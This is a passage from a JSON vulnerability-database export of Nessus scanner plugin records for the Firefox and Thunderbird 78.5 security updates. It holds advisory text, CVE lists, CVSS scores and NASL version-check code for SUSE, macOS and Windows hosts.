security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MozillaFirefox\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-21T14:40:12", "description": "The version of Thunderbird installed on the remote macOS or Mac OS X host is prior to 78.5. It is, therefore, affected by multiple vulnerabilities as referenced in the mfsa2020-52 advisory.\n\n - Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-11-18T00:00:00", "type": "nessus", "title": "Mozilla Thunderbird < 78.5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999", "CVE-2020-16012", "CVE-2020-26951", "CVE-2020-26953", "CVE-2020-26956", "CVE-2020-26958", "CVE-2020-26959", "CVE-2020-26960", "CVE-2020-26961", "CVE-2020-26965", "CVE-2020-26966", "CVE-2020-26968"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:mozilla:thunderbird"], "id": "MACOS_THUNDERBIRD_78_5.NASL", "href": "https://www.tenable.com/plugins/nessus/143059", "sourceData": "## \n# (C) Tenable Network Security, Inc.\n# \n# The descriptive text and package checks in this plugin were\n# extracted from Mozilla Foundation Security Advisory mfsa2020-52.\n# The text itself is copyright (C) Mozilla Foundation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143059);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-15999\",\n \"CVE-2020-16012\",\n \"CVE-2020-26951\",\n \"CVE-2020-26953\",\n \"CVE-2020-26956\",\n \"CVE-2020-26958\",\n \"CVE-2020-26959\",\n \"CVE-2020-26960\",\n \"CVE-2020-26961\",\n \"CVE-2020-26965\",\n \"CVE-2020-26966\",\n \"CVE-2020-26968\"\n );\n script_xref(name:\"MFSA\", value:\"2020-52\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"Mozilla Thunderbird < 78.5\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A mail client installed on the remote macOS or Mac OS X host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Thunderbird installed on the remote macOS or Mac OS X host is prior to 78.5. It is, therefore, affected\nby multiple vulnerabilities as referenced in the mfsa2020-52 advisory.\n\n - Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2020-52/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mozilla Thunderbird version 78.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-26968\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:thunderbird\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_thunderbird_installed.nasl\");\n script_require_keys(\"MacOSX/Thunderbird/Installed\");\n\n exit(0);\n}\n\ninclude('mozilla_version.inc');\n\nkb_base = 'MacOSX/Thunderbird';\nget_kb_item_or_exit(kb_base+'/Installed');\n\nversion = get_kb_item_or_exit(kb_base+'/Version', exit_code:1);\npath = get_kb_item_or_exit(kb_base+'/Path', exit_code:1);\n\nis_esr = get_kb_item(kb_base+'/is_esr');\nif (is_esr) exit(0, 'The Mozilla Thunderbird installation is in the ESR branch.');\n\nmozilla_check_version(version:version, path:path, product:'thunderbird', esr:FALSE, fix:'78.5', xss:TRUE, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-21T14:41:39", "description": "The version of Thunderbird installed on the remote Windows host is prior to 78.5. It is, therefore, affected by multiple vulnerabilities as referenced in the mfsa2020-52 advisory.\n\n - Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-11-18T00:00:00", "type": "nessus", "title": "Mozilla Thunderbird < 78.5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999", "CVE-2020-16012", "CVE-2020-26951", "CVE-2020-26953", "CVE-2020-26956", "CVE-2020-26958", "CVE-2020-26959", "CVE-2020-26960", "CVE-2020-26961", "CVE-2020-26965", "CVE-2020-26966", "CVE-2020-26968"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:mozilla:thunderbird"], "id": "MOZILLA_THUNDERBIRD_78_5.NASL", "href": "https://www.tenable.com/plugins/nessus/143058", "sourceData": "## \n# (C) Tenable Network Security, Inc.\n# \n# The descriptive text and package checks in this plugin were\n# extracted from Mozilla Foundation Security Advisory mfsa2020-52.\n# The text itself is copyright (C) Mozilla Foundation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143058);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-15999\",\n \"CVE-2020-16012\",\n \"CVE-2020-26951\",\n \"CVE-2020-26953\",\n \"CVE-2020-26956\",\n \"CVE-2020-26958\",\n \"CVE-2020-26959\",\n \"CVE-2020-26960\",\n \"CVE-2020-26961\",\n \"CVE-2020-26965\",\n \"CVE-2020-26966\",\n \"CVE-2020-26968\"\n );\n script_xref(name:\"MFSA\", value:\"2020-52\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"Mozilla Thunderbird < 78.5\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A mail client installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Thunderbird installed on the remote Windows host is prior to 78.5. It is, therefore, affected by multiple\nvulnerabilities as referenced in the mfsa2020-52 advisory.\n\n - Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2020-52/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mozilla Thunderbird version 78.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-26968\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:thunderbird\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mozilla_org_installed.nasl\");\n script_require_keys(\"Mozilla/Thunderbird/Version\");\n\n exit(0);\n}\n\ninclude('mozilla_version.inc');\n\nport = get_kb_item('SMB/transport');\nif (!port) port = 445;\n\ninstalls = get_kb_list('SMB/Mozilla/Thunderbird/*');\nif (isnull(installs)) audit(AUDIT_NOT_INST, 'Thunderbird');\n\nmozilla_check_version(installs:installs, product:'thunderbird', esr:FALSE, fix:'78.5', xss:TRUE, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-21T14:41:10", "description": "The version of Firefox ESR installed on the remote Windows host is prior to 78.5. It is, therefore, affected by multiple vulnerabilities as referenced in the mfsa2020-51 advisory.\n\n - Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-11-17T00:00:00", "type": "nessus", "title": "Mozilla Firefox ESR < 78.5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999", "CVE-2020-16012", "CVE-2020-26951", "CVE-2020-26953", "CVE-2020-26956", "CVE-2020-26958", "CVE-2020-26959", "CVE-2020-26960", "CVE-2020-26961", "CVE-2020-26965", "CVE-2020-26966", "CVE-2020-26968"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:mozilla:firefox_esr"], "id": "MOZILLA_FIREFOX_78_5_ESR.NASL", "href": "https://www.tenable.com/plugins/nessus/142913", "sourceData": "## \n# (C) Tenable Network Security, Inc.\n# \n# The descriptive text and package checks in this plugin were\n# extracted from Mozilla Foundation Security Advisory mfsa2020-51.\n# The text itself is copyright (C) Mozilla Foundation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142913);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-15999\",\n \"CVE-2020-16012\",\n \"CVE-2020-26951\",\n \"CVE-2020-26953\",\n \"CVE-2020-26956\",\n \"CVE-2020-26958\",\n \"CVE-2020-26959\",\n \"CVE-2020-26960\",\n \"CVE-2020-26961\",\n \"CVE-2020-26965\",\n \"CVE-2020-26966\",\n \"CVE-2020-26968\"\n );\n script_xref(name:\"MFSA\", value:\"2020-51\");\n script_xref(name:\"IAVA\", value:\"2020-A-0537-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"Mozilla Firefox ESR < 78.5\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Firefox ESR installed on the remote Windows host is prior to 78.5. It is, therefore, affected by multiple\nvulnerabilities as referenced in the mfsa2020-51 advisory.\n\n - Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2020-51/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mozilla Firefox ESR version 78.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-26968\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:firefox_esr\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mozilla_org_installed.nasl\");\n script_require_keys(\"Mozilla/Firefox/Version\");\n\n exit(0);\n}\n\ninclude('mozilla_version.inc');\n\nport = get_kb_item('SMB/transport');\nif (!port) port = 445;\n\ninstalls = get_kb_list('SMB/Mozilla/Firefox/*');\nif (isnull(installs)) audit(AUDIT_NOT_INST, 'Firefox');\n\nmozilla_check_version(installs:installs, product:'firefox', esr:TRUE, fix:'78.5', min:'78.0.0', xss:TRUE, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-21T14:42:34", "description": "This update for MozillaFirefox fixes the following issues :\n\nFirefox Extended Support Release 78.5.0 ESR (bsc#1178824)\n\n - CVE-2020-26951: Parsing mismatches could confuse and bypass security sanitizer for chrome privileged code\n\n - CVE-2020-16012: Variable time processing of cross-origin images during drawImage calls\n\n - CVE-2020-26953: Fullscreen could be enabled without displaying the security UI\n\n - CVE-2020-26956: XSS through paste (manual and clipboard API)\n\n - CVE-2020-26958: Requests intercepted through ServiceWorkers lacked MIME type restrictions\n\n - CVE-2020-26959: Use-after-free in WebRequestService\n\n - CVE-2020-26960: Potential use-after-free in uses of nsTArray\n\n - CVE-2020-15999: Heap buffer overflow in freetype\n\n - CVE-2020-26961: DoH did not filter IPv4 mapped IP Addresses\n\n - CVE-2020-26965: Software keyboards may have remembered typed passwords\n\n - CVE-2020-26966: Single-word search queries were also broadcast to local network\n\n - CVE-2020-26968: Memory safety bugs fixed in Firefox 83 and Firefox ESR 78.5\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : MozillaFirefox (SUSE-SU-2020:3383-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999", "CVE-2020-16012", "CVE-2020-26951", "CVE-2020-26953", "CVE-2020-26956", "CVE-2020-26958", "CVE-2020-26959", "CVE-2020-26960", "CVE-2020-26961", "CVE-2020-26965", "CVE-2020-26966", "CVE-2020-26968"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:MozillaFirefox", "p-cpe:/a:novell:suse_linux:MozillaFirefox-debuginfo", "p-cpe:/a:novell:suse_linux:MozillaFirefox-debugsource", "p-cpe:/a:novell:suse_linux:MozillaFirefox-devel", "p-cpe:/a:novell:suse_linux:MozillaFirefox-translations-common", "p-cpe:/a:novell:suse_linux:MozillaFirefox-translations-other", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2020-3383-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143745", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:3383-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143745);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-15999\",\n \"CVE-2020-16012\",\n \"CVE-2020-26951\",\n \"CVE-2020-26953\",\n \"CVE-2020-26956\",\n \"CVE-2020-26958\",\n \"CVE-2020-26959\",\n \"CVE-2020-26960\",\n \"CVE-2020-26961\",\n \"CVE-2020-26965\",\n \"CVE-2020-26966\",\n \"CVE-2020-26968\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : MozillaFirefox (SUSE-SU-2020:3383-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for MozillaFirefox fixes the following issues :\n\nFirefox Extended Support Release 78.5.0 ESR (bsc#1178824)\n\n - CVE-2020-26951: Parsing mismatches could confuse and\n bypass security sanitizer for chrome privileged code\n\n - CVE-2020-16012: Variable time processing of cross-origin\n images during drawImage calls\n\n - CVE-2020-26953: Fullscreen could be enabled without\n displaying the security UI\n\n - CVE-2020-26956: XSS through paste (manual and clipboard\n API)\n\n - CVE-2020-26958: Requests intercepted through\n ServiceWorkers lacked MIME type restrictions\n\n - CVE-2020-26959: Use-after-free in WebRequestService\n\n - CVE-2020-26960: Potential use-after-free in uses of\n nsTArray\n\n - CVE-2020-15999: Heap buffer overflow in freetype\n\n - CVE-2020-26961: DoH did not filter IPv4 mapped IP\n Addresses\n\n - CVE-2020-26965: Software keyboards may have remembered\n typed passwords\n\n - CVE-2020-26966: Single-word search queries were also\n broadcast to local network\n\n - CVE-2020-26968: Memory safety bugs fixed in Firefox 83\n and Firefox ESR 78.5\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1178824\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-15999/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-16012/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26951/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26953/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26956/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26958/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26959/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26960/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26961/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26965/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26966/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26968/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20203383-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3e3eae17\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Desktop Applications 15-SP1 :\n\nzypper in -t patch\nSUSE-SLE-Module-Desktop-Applications-15-SP1-2020-3383=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-26968\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"MozillaFirefox-78.5.0-3.119.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"MozillaFirefox-debuginfo-78.5.0-3.119.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"MozillaFirefox-debugsource-78.5.0-3.119.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"MozillaFirefox-devel-78.5.0-3.119.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"MozillaFirefox-translations-common-78.5.0-3.119.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"MozillaFirefox-translations-other-78.5.0-3.119.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"MozillaFirefox-78.5.0-3.119.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"MozillaFirefox-debuginfo-78.5.0-3.119.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"MozillaFirefox-debugsource-78.5.0-3.119.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"MozillaFirefox-devel-78.5.0-3.119.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"MozillaFirefox-translations-common-78.5.0-3.119.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"MozillaFirefox-translations-other-78.5.0-3.119.1\")) flag++;\n\n\nif (flag)\n{\n set_kb_item(name:'www/0/XSS', value:TRUE);\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MozillaFirefox\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-21T14:41:38", "description": "This update for MozillaThunderbird fixes the following issues :\n\nTODO\n\n - Mozilla Thunderbird 78.5.0\n\n - new: OpenPGP: Added option to disable attaching the public key to a signed message (bmo#1654950)\n\n - new: MailExtensions: 'compose_attachments' context added to Menus API (bmo#1670822)\n\n - new: MailExtensions: Menus API now available on displayed messages (bmo#1670825)\n\n - changed: MailExtensions: browser.tabs.create will now wait for 'mail-delayed-startup-finished' event (bmo#1674407)\n\n - fixed: OpenPGP: Support for inline PGP messages improved (bmo#1672851)\n\n - fixed: OpenPGP: Message security dialog showed unverified keys as unavailable (bmo#1675285)\n\n - fixed: Chat: New chat contact menu item did not function (bmo#1663321)\n\n - fixed: Various theme and usability improvements (bmo#1673861)\n\n - fixed: Various security fixes MFSA 2020-52 (bsc#1178894)\n\n - CVE-2020-26951 (bmo#1667113) Parsing mismatches could confuse and bypass security sanitizer for chrome privileged code\n\n - CVE-2020-16012 (bmo#1642028) Variable time processing of cross-origin images during drawImage calls\n\n - CVE-2020-26953 (bmo#1656741) Fullscreen could be enabled without displaying the security UI\n\n - CVE-2020-26956 (bmo#1666300) XSS through paste (manual and clipboard API)\n\n - CVE-2020-26958 (bmo#1669355) Requests intercepted through ServiceWorkers lacked MIME type restrictions\n\n - CVE-2020-26959 (bmo#1669466) Use-after-free in WebRequestService\n\n - CVE-2020-26960 (bmo#1670358) Potential use-after-free in uses of nsTArray\n\n - CVE-2020-15999 (bmo#1672223) Heap buffer overflow in freetype\n\n - CVE-2020-26961 (bmo#1672528) DoH did not filter IPv4 mapped IP Addresses\n\n - CVE-2020-26965 (bmo#1661617) Software keyboards may have remembered typed passwords\n\n - CVE-2020-26966 (bmo#1663571) Single-word search queries were also broadcast to local network\n\n - CVE-2020-26968 (bmo#1551615, bmo#1607762, bmo#1656697, bmo#1657739, bmo#1660236, bmo#1667912, bmo#1671479, bmo#1671923) Memory safety bugs fixed in Thunderbird 78.5\n\n - Mozilla Thunderbird 78.4.3 \n\n - fixed: User interface was inconsistent when switching from the default theme to the dark theme and back to the default theme (bmo#1659282)\n\n - fixed: Email subject would disappear when hovering 